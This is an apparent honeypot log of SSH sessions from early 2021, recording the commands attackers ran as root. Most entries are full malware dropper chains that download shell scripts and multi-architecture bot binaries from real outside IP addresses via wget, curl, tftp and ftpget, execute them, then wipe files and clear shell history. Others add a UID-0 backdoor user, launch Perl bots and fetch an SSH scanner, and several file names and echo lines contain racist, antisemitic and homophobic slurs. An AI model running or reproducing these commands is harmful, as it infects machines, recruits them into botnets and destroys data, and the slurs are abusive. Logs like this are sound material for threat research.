wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
chmod 777 downloadthesebinsyoudirtyslut.arm6
./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
chmod 777 downloadthesebinsyoudirtyslut.arm7
./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
chmod 777 downloadthesebinsyoudirtyslut.ppc
./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 151.115.42.108 18-Jan-2021 01:13:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.216.7.148/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.216.7.148 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.216.7.148; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.216.7.148 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://162.216.7.148/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 162.216.7.148 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 162.216.7.148
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 162.216.7.148 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 185.239.242.109 18-Jan-2021 04:24:10 ssh2 root
Exec cd /tmp; wget http://46.29.163.64/host.sh; chmod 777 host.sh; sh host.sh; tftp 46.29.163.64 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.29.163.64; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *;

cd /tmp
wget http://46.29.163.64/host.sh
chmod 777 host.sh
sh host.sh
tftp 46.29.163.64 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 46.29.163.64
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 68.183.177.78 18-Jan-2021 05:05:58 ssh2 root
Exec cd /tmp  cd /dev  cd /mnt  cd /var; wget http://194.87.138.179/sh; curl -O http://194.87.138.179/sh; chmod 777 sh; ./sh; rm -rf sh
cd /tmp cd /dev cd /mnt cd /var
wget http://194.87.138.179/sh
curl -O http://194.87.138.179/sh
chmod 777 sh
./sh
rm -rf sh

From 82.79.152.57 19-Jan-2021 04:17:45 ssh2 root
w
free -mt
nproc
ls -a
cat /etc/issue
ifconfig
ls -a
rm -rf .*
rm -rf *
ls -a
cd /var/tmp
ls -a
clear
uptime
clear
yum update
apt update
apt-get
apt-get update
clear
clear

From 82.79.152.57 19-Jan-2021 04:19:16 ssh2 root
ls -a
ls
rm -rf *
ls -a
ls
clear
cat te
reboot
halt

From 142.44.222.33 20-Jan-2021 04:20:17 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.242.88/zeros6x.sh; curl -O http://185.239.242.88/zeros6x.sh; chmod 777 zeros6x.sh; sh zeros6x.sh; tftp 185.239.242.88 -c get zeros6x.sh; chmod 777 zeros6x.sh; sh zeros6x.sh; tftp -r zeros6x2.sh -g 185.239.242.88; chmod 777 zeros6x2.sh; sh zeros6x2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.239.242.88 zeros6x1.sh zeros6x1.sh; sh zeros6x1.sh; rm -rf zeros6x.sh zeros6x.sh zeros6x2.sh zeros6x1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.239.242.88/zeros6x.sh
curl -O http://185.239.242.88/zeros6x.sh
chmod 777 zeros6x.sh
sh zeros6x.sh
tftp 185.239.242.88 -c get zeros6x.sh
chmod 777 zeros6x.sh
sh zeros6x.sh
tftp -r zeros6x2.sh -g 185.239.242.88
chmod 777 zeros6x2.sh
sh zeros6x2.sh
ftpget -v -u anonymous -p anonymous -P 21 185.239.242.88 zeros6x1.sh zeros6x1.sh
sh zeros6x1.sh
rm -rf zeros6x.sh zeros6x.sh zeros6x2.sh zeros6x1.sh
rm -rf *

From 23.94.186.31 20-Jan-2021 09:32:38 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86; curl -O https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86; chmod 777 * ;./fatnigger.x86 root
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86
curl -O https://cdn.discordapp.com/attachments/774171000073355309/793874993091051549/fatnigger.x86
chmod 777 *
./fatnigger.x86 root

From 185.239.242.104 22-Jan-2021 06:23:38 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.245.85/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 104.168.245.85 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 104.168.245.85; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.245.85/Heisenbergbins.sh
chmod 777 Heisenbergbins.sh
sh Heisenbergbins.sh
tftp 104.168.245.85 -c get Heisenbergtftp1.sh
chmod 777 Heisenbergtftp1.sh
sh Heisenbergtftp1.sh
tftp -r Heisenbergtftp2.sh -g 104.168.245.85
chmod 777 Heisenbergtftp2.sh
sh Heisenbergtftp2.sh
rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh
rm -rf *

From 193.239.147.226 22-Jan-2021 16:19:57 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; chmod 777 downloadthesebinsyoudirtyslut.x86 ; ./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; chmod 777 niggadownloadthesebinsyoudirtyslut.mips ; ./downloadthesebinsyoudirtyslut.mips OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ otherbinexecxdlmfao ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; chmod 777 downloadthesebinsyoudirtyslut.arm4 ; ./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; chmod 777 downloadthesebinsyoudirtyslut.arm5 ; ./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; chmod 777 downloadthesebinsyoudirtyslut.arm6 ; ./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; chmod 777 downloadthesebinsyoudirtyslut.arm7 ; ./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86
chmod 777 downloadthesebinsyoudirtyslut.x86
./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86
wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips
chmod 777 niggadownloadthesebinsyoudirtyslut.mips
./downloadthesebinsyoudirtyslut.mips OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ otherbinexecxdlmfao
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
chmod 777 downloadthesebinsyoudirtyslut.arm4
./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
chmod 777 downloadthesebinsyoudirtyslut.arm5
./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
chmod 777 downloadthesebinsyoudirtyslut.arm6
./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
chmod 777 downloadthesebinsyoudirtyslut.arm7
./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 116.199.101.225 27-Jan-2021 01:11:50 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 116.199.101.225 27-Jan-2021 01:11:50 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 116.199.101.225 27-Jan-2021 01:11:50 ssh2 root
Exec cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
cat /proc/uptime

From 116.199.101.225 27-Jan-2021 01:11:52 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 90.255.231.176 27-Jan-2021 18:42:52 ssh2 root
cat /proc/cpuinfo | grep name | wc -l
exit

From 51.161.31.128 27-Jan-2021 19:34:32 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.242.175/Pemex.sh; curl -O http://185.239.242.175/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 185.239.242.175 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 185.239.242.175; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.239.242.175 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.239.242.175/Pemex.sh
curl -O http://185.239.242.175/Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp 185.239.242.175 -c get Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp -r Pemex2.sh -g 185.239.242.175
chmod 777 Pemex2.sh
sh Pemex2.sh
ftpget -v -u anonymous -p anonymous -P 21 185.239.242.175 Pemex1.sh Pemex1.sh
sh Pemex1.sh
rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh
rm -rf *

From 206.166.251.64 27-Jan-2021 23:48:26 ssh2 root
Exec cd /tmp || cd /; wget -q http://172.245.81.107/cometome; cat cometome > vegaiscoming; chmod +x vegaiscoming; ./vegaiscoming
cd /tmp || cd /
wget -q http://172.245.81.107/cometome
cat cometome > vegaiscoming
chmod +x vegaiscoming
./vegaiscoming

From 23.94.186.6 28-Jan-2021 10:15:04 ssh2 root
Exec cat /etc/issue ; cwget https://cdn.discordapp.com/attachments/788792529372839956/791041217654947910/fatnigger.x86 --no-check-certificate -c ; chmod 777 fatnigger.x86 ; ./fatnigger.x86 root
cat /etc/issue
cwget https://cdn.discordapp.com/attachments/788792529372839956/791041217654947910/fatnigger.x86 --no-check-certificate -c
chmod 777 fatnigger.x86
./fatnigger.x86 root

From 111.18.172.94 28-Jan-2021 14:40:12 ssh2 root
ls
wget http://64.32.4.4:452/python

From 111.18.172.94 28-Jan-2021 14:42:46 ssh2 root
ls
yum -y install wget
wget yum -y install wget
wget http://64.32.4.4:452/python
wget http://64.32.4.4:452/python -c

From 185.117.119.189 29-Jan-2021 20:45:32 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.48.55/x86; curl -O http://209.141.48.55/x86; cat x86 > 0x3a13a141f0c; chmod +x *; ./0x3a13a141f0c Exploit.x86.BadWolf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.48.55/x86
curl -O http://209.141.48.55/x86
cat x86 > 0x3a13a141f0c
chmod +x *
./0x3a13a141f0c Exploit.x86.BadWolf

From 104.248.200.235 30-Jan-2021 10:40:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.173.171.123/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 107.173.171.123 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.173.171.123; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.173.171.123/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 107.173.171.123 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.173.171.123
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 104.248.198.248 30-Jan-2021 23:07:01 ssh2 root
Exec wget http://37.46.150.46/KillerSecurity/K1lLeR.x86; chmod 777 K1lLeR.x86; ./K1lLeR.x86 root; rm -rf K1lLeR.x86; history -c
wget http://37.46.150.46/KillerSecurity/K1lLeR.x86
chmod 777 K1lLeR.x86
./K1lLeR.x86 root
rm -rf K1lLeR.x86
history -c

From 185.239.242.158 31-Jan-2021 19:53:16 ssh2 root
Exec wget http://transfer.sh/get/kanEU/wkomqp; chmod 777 *; ./wkomqp
wget http://transfer.sh/get/kanEU/wkomqp
chmod 777 *
./wkomqp

From 205.185.125.189 31-Jan-2021 23:08:38 ssh2 root
Exec cat /etc/issue; wget http://45.130.138.17/s.sh; sh s.sh; echo llo
cat /etc/issue
wget http://45.130.138.17/s.sh
sh s.sh
echo llo

From 206.189.80.67 31-Jan-2021 23:33:07 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.145.185.10/sh.sh; chmod 777 sh.sh; sh sh.sh; tftp 45.145.185.10 -c get ab.sh; chmod 777 ab.sh; sh ab.sh; tftp -r ac.sh -g 45.145.185.10; chmod 777 ac.sh; sh ac.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.10 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sh.sh ab.sh ac.sh ftp1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://45.145.185.10/sh.sh
chmod 777 sh.sh
sh sh.sh
tftp 45.145.185.10 -c get ab.sh
chmod 777 ab.sh
sh ab.sh
tftp -r ac.sh -g 45.145.185.10
chmod 777 ac.sh
sh ac.sh
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.10 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf sh.sh ab.sh ac.sh ftp1.sh
rm -rf *

From 146.255.75.61 1-Feb-2021 00:04:14 ssh2 root
w
cd /home
ls

From 13.78.132.59 1-Feb-2021 00:30:34 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://40.123.250.140/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 40.123.250.140 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://40.123.250.140/ISIS.sh
chmod 777 *
sh ISIS.sh
tftp -g 40.123.250.140 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 223.119.31.229 1-Feb-2021 14:40:16 ssh2 root
Exec uname -a & lscpu ; curl -O http://51.91.78.140/s.txt ; perl s.txt ; rm -rf s.txt
uname -a
lscpu
curl -O http://51.91.78.140/s.txt
perl s.txt
rm -rf s.txt

From 205.185.125.189 2-Feb-2021 03:16:35 ssh2 root
Exec cat /etc/issue; echo unstable is faggot
cat /etc/issue
echo unstable is faggot

From 185.239.242.104 2-Feb-2021 12:23:10 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.245.85/Heisen123bins.sh; chmod 777 Heisen123bins.sh; sh Heisen123bins.sh; tftp 104.168.245.85 -c get Heisen123tftp1.sh; chmod 777 Heisen123tftp1.sh; sh Heisen123tftp1.sh; tftp -r Heisen123tftp2.sh -g 104.168.245.85; chmod 777 Heisen123tftp2.sh; sh Heisen123tftp2.sh; rm -rf Heisen123bins.sh Heisen123tftp1.sh Heisen123tftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.245.85/Heisen123bins.sh
chmod 777 Heisen123bins.sh
sh Heisen123bins.sh
tftp 104.168.245.85 -c get Heisen123tftp1.sh
chmod 777 Heisen123tftp1.sh
sh Heisen123tftp1.sh
tftp -r Heisen123tftp2.sh -g 104.168.245.85
chmod 777 Heisen123tftp2.sh
sh Heisen123tftp2.sh
rm -rf Heisen123bins.sh Heisen123tftp1.sh Heisen123tftp2.sh
rm -rf *

From 138.68.83.217 2-Feb-2021 22:24:06 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.87.139.159/8UsA.sh; curl -O http://194.87.139.159/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 194.87.139.159 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 194.87.139.159; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.87.139.159 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.87.139.159/8UsA.sh
curl -O http://194.87.139.159/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 194.87.139.159 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 194.87.139.159
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.87.139.159 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 91.219.236.190 2-Feb-2021 22:29:43 ssh2 root
w
uname -a
passwd
nproc
ls -a
nproc
ip a|grep glo
ip a|grep glo
uname -a
cd /var/tmp
ls -a
ls -a
wget dauporno.do.amx1.txt
wget dauporno.do.am/x1.txt
curl -O dauporno.do.am/x1.txt
ls -a
ps -x
cd /var/tmp
ls -a
ls -a

From 91.219.236.190 2-Feb-2021 22:34:04 ssh2 root
unamme -a
/sbin/ifconfig |grep inet
ls -a
ps -x
wget
history
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nproc
ls -a
ls -a
ls
nano test1.pl
vi test1.pl
vim test1.pl

From 141.98.80.98 2-Feb-2021 22:38:41 ssh2 root
ps -x
nproc
ps -x

From 97.127.136.197 2-Feb-2021 22:41:44 ssh2 root
Exec /ip cloud print
/ip cloud print
curl -o
apt install curl
curl -O
apt remove curl
apt delete curl
apt install wget
wget
wget --continue
wget -c
wget --no-check-certificate dauporno.do.am/x1.txt
ftp
curl -O
wget
uname -a
nproc
uptime

From 185.100.87.206 2-Feb-2021 22:46:35 ssh2 root
apt-get update
apt update
w
history
ps -x
uname -a
passwd
chpasswd
passwd
passsword
password

From 195.3.147.47 2-Feb-2021 22:48:56 ssh2 root
/usr/sbin/useradd -o -u 0 bash
/sbin/ifconfig
cat /etc/passwd
ssh -V

From 91.219.236.190 2-Feb-2021 22:50:37 ssh2 root
/etc/sudoders
cat /etc/sudoders
chsh -s /bin/bash root
chsh -s /bin/bash admin

From 95.19.252.139 2-Feb-2021 23:26:10 ssh2 root
w
cd /home ls
ls nproc
ps -x
cd ..
ls -a
cat /proc/cpuinfo
ifconfig
w

From 141.98.80.98 2-Feb-2021 23:28:58 ssh2 root
cat /etc/issue
exit

From 91.219.236.190 2-Feb-2021 23:36:18 ssh2 root
w
ss
c
f
s
w
w
ww
nproc
w

From 51.75.67.82 2-Feb-2021 23:39:07 ssh2 root
ls -as
ps aux
set +o history
ls -as
ls -as
cd .kde2
ls
perl network.pl
exit

From 95.19.252.139 3-Feb-2021 14:15:32 ssh2 root
bash
ls -a
ls -a
cat .bash_history
cat /dev/null > .bash_history
cd .ssh
ls
cat nsmail
cat reglas
./test.pl
cd /var/tmp
ls -a
cd /test
ls
ls -a
cd /home
ls
nproc
unreadsnf
cd
cd /dev/sh.
cd
wget
cd /dev/shm
ls
cd
cd .ssh
ls
mkdir " .."
cat /etc/issue
uname -a
wget prg.do.am/scan/prgssh4.tgz
wget prg.do.am/scan/prgssh4.tgz prg.do.am/scan/prgssh4.tgz
wget prg.do.am/scan/prgssh4.tgz
exit

From 178.62.205.92 3-Feb-2021 15:22:17 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://145.239.220.46/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 145.239.220.46 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 145.239.220.46; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://145.239.220.46/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 145.239.220.46 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 145.239.220.46
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 206.189.96.248 4-Feb-2021 00:59:45 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.116.180.169/sh; curl -O http://51.116.180.169/sh; chmod 777 sh; sh sh; tftp 51.116.180.169 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.116.180.169; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.116.180.169 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.116.180.169/sh
curl -O http://51.116.180.169/sh
chmod 777 sh
sh sh
tftp 51.116.180.169 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 51.116.180.169
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 51.116.180.169 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 157.245.141.237 4-Feb-2021 14:59:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.105.79.99/bomba.sh; curl -O http://172.105.79.99/bomba.sh; chmod 777 bomba.sh; sh bomba.sh; tftp 172.105.79.99 -c get bomba.sh; chmod 777 bomba.sh; sh bomba.sh; tftp -r bomba2.sh -g 172.105.79.99; chmod 777 bomba2.sh; sh bomba2.sh; ftpget -v -u anonymous -p anonymous -P 21 172.105.79.99 bomba1.sh bomba1.sh; sh bomba1.sh; rm -rf bomba.sh bomba.sh bomba2.sh bomba1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.105.79.99/bomba.sh
curl -O http://172.105.79.99/bomba.sh
chmod 777 bomba.sh
sh bomba.sh
tftp 172.105.79.99 -c get bomba.sh
chmod 777 bomba.sh
sh bomba.sh
tftp -r bomba2.sh -g 172.105.79.99
chmod 777 bomba2.sh
sh bomba2.sh
ftpget -v -u anonymous -p anonymous -P 21 172.105.79.99 bomba1.sh bomba1.sh
sh bomba1.sh
rm -rf bomba.sh bomba.sh bomba2.sh bomba1.sh
rm -rf *

From 167.99.209.21 4-Feb-2021 18:11:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.175.41/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 192.210.175.41 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.210.175.41; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://192.210.175.41/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 192.210.175.41 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 192.210.175.41
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 167.99.43.248 5-Feb-2021 03:05:09 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.123.7.10/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 176.123.7.10 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 176.123.7.10; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://176.123.7.10/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 176.123.7.10 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 176.123.7.10
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 159.89.20.95 7-Feb-2021 07:08:23 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.94.99.40/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 23.94.99.40 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.94.99.40/ISIS.sh
chmod 777 *
sh ISIS.sh
tftp -g 23.94.99.40 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 51.210.138.178 7-Feb-2021 12:52:09 ssh2 root
Exec uname -a ; nproc
uname -a
nproc

From 68.183.66.44 7-Feb-2021 17:59:03 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.75.190.159/sh; curl -O http://51.75.190.159/sh; chmod 777 sh; sh sh; tftp 51.75.190.159 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.75.190.159; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.75.190.159 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.75.190.159/sh
curl -O http://51.75.190.159/sh
chmod 777 sh
sh sh
tftp 51.75.190.159 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 51.75.190.159
chmod 777 .sh
sh .sh
